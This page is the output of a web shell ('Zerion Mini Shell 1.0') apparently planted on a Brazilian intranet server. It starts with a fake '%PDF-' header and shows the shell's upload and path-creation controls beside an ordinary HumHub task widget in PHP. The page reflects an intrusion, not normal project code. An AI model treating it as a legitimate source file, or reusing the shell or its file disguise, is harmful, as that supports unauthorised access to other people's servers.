%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/tasks/widgets/
Upload File :
Create Path :
Current File : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/tasks/widgets/AddItemsInput.php

<?php
/**
 * @link https://www.humhub.org/
 * @copyright Copyright (c) 2018 HumHub GmbH & Co. KG
 * @license https://www.humhub.com/licences
 *
 */

namespace humhub\modules\tasks\widgets;

use humhub\components\Widget;

/**
 * TaskItemWidget is used to display a task item.
 *
 * This Widget will used by the Task Model in Method getWallOut().
 *
 * @author davidborn
 */
class AddItemsInput extends Widget
{
    
    public $name;

    public function run()
    {
        return $this->render('addItemsInput', ['name' => $this->name]);
    }

}

?>

Zerion Mini Shell 1.0